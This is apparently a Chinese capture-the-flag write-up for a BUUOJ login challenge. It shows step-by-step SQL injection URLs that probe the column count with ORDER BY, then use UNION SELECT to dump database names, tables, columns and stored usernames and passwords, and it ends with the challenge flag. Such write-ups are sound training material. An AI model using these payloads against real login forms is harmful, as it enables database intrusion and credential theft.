万能密码登入
尝试解密MD5,解密失败尝试其他注入思路
http://c95aaa7f-1256-4f57-b564-0ddf58b3bb67.node3.buuoj.cn/check.php?username=admin' order by 3%23&password=123 有回显
http://c95aaa7f-1256-4f57-b564-0ddf58b3bb67.node3.buuoj.cn/check.php?username=admin' order by 4%23&password=123 报错
说明存在3列
http://c95aaa7f-1256-4f57-b564-0ddf58b3bb67.node3.buuoj.cn/check.php?username=admin' and 1=2 union select 1,2,3%23&password=123
按照暴库,爆表,爆列,爆数据的顺序进行
爆库
http://c95aaa7f-1256-4f57-b564-0ddf58b3bb67.node3.buuoj.cn/check.php?username=admin' and 1=2 union select 1,2,group_concat(schema_name) from information_schema.schemata%23&password=123
爆geek库表
http://c95aaa7f-1256-4f57-b564-0ddf58b3bb67.node3.buuoj.cn/check.php?username=admin' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek'%23&password=123
爆列
http://c95aaa7f-1256-4f57-b564-0ddf58b3bb67.node3.buuoj.cn/check.php?username=admin' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'%23&password=123
爆数据
http://c95aaa7f-1256-4f57-b564-0ddf58b3bb67.node3.buuoj.cn/check.php?username=admin' and 1=2 union select 1,2,group_concat(concat_ws(0x7e,username,password)) from geek.l0ve1ysq1%23&password=123
flag{670a6b35-4087-4d14-ad11-1e8497e534c8}